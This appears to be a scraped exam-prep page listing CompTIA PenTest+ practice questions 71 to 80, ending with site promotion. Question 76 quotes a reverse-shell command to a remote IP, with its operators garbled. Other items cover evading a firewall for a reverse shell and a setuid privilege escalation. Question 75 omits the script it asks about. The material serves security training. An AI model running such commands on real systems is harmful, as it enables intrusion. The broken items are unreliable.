PT0-001 Exam Details

  • Exam Code
    :PT0-001
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :306 Q&As
  • Last Updated
    :Apr 01, 2024

CompTIA PT0-001 Online Questions & Answers

  • Question 71:

    A penetration tester is attempting to scan a legacy web application using the scanner's default scan settings. The scans continually result in the application becoming unresponsive. Which of the following can help to alleviate this issue?

    A. Packet shaping
    B. Flow control
    C. Bandwidth limits
    D. Query throttling

  • Question 72:

    Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?

    A. To remove the persistence
    B. To enable penitence
    C. To report persistence
    D. To check for persistence

  • Question 73:

    A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?

    A. Appendices
    B. Executive summary
    C. Technical summary
    D. Main body

  • Question 74:

    A penetration tester is preparing for an assessment of a web server's security, which is used to host several sensitive web applications. The web server is PKI protected, and the penetration tester reviews the certificate presented by the server during the SSL handshake. Which of the following certificate fields or extensions would be of MOST use to the penetration tester during an assessment?

    A. Subject key identifier
    B. Subject alternative name
    C. Authority information access
    D. Service principal name

  • Question 75:

    Given the following Python script:

    Which of the following is where the output will go?

    A. To the screen
    B. To a network server
    C. To a file
    D. To /dev/null

  • Question 76:

    The following line was found in an exploited machine's history file. An attacker ran the following command:

    bash -i >and /dev/tcp/192.168.0.1/80 0> and1

    Which of the following describes what the command does?

    A. Performs a port scan.
    B. Grabs the web server's banner.
    C. Redirects a TTY to a remote system.
    D. Removes error logs for the supplied IP.

  • Question 77:

    Joe, a penetration tester, was able to exploit a web application behind a firewall. He is trying to get a reverse shell back to his machine, but the firewall blocks the outgoing traffic. Ports for which of the following should the security consultant use to have the HIGHEST chance to bypass the firewall?

    A. SMB
    B. SMTP
    C. FTP
    D. DNS

  • Question 78:

    A client's systems administrator requests a copy of the report from the penetration tester, but the systems administrator is not listed as a point of contact or signatory. Which of the following is the penetration tester's BEST course of action?

    A. Send the report since the systems administrator will be in charge of implementing the fixes.
    B. Send the report and carbon copy the point of contact/signatory for visibility.
    C. Reply and explain to the systems administrator that proper authorization is needed to provide the report.
    D. Forward the request to the point of contact/signatory for authorization.

  • Question 79:

    A penetration tester is performing a code review. Which of the following testing techniques is being performed?

    A. Dynamic analysis
    B. Fuzzing analysis
    C. Static analysis
    D. Run-time analysis

  • Question 80:

    After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled ’’changepass.”

    -sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass

    Using “strings" to print ASCII printable characters from changepass, the tester notes the following:

    $ strings changepassexit setuid strcmpGLIBC_2.0 ENV_PATH %s/changepwmalloc strlen

    Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?

    A. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass
    B. Create a copy of changepass in the same directory, naming it changpw. Export the ENV_PATH environmental variable to the path "/home/user'. Then run changepass
    C. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary title changepw
    D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of `/usr/local/bin'

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-001 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.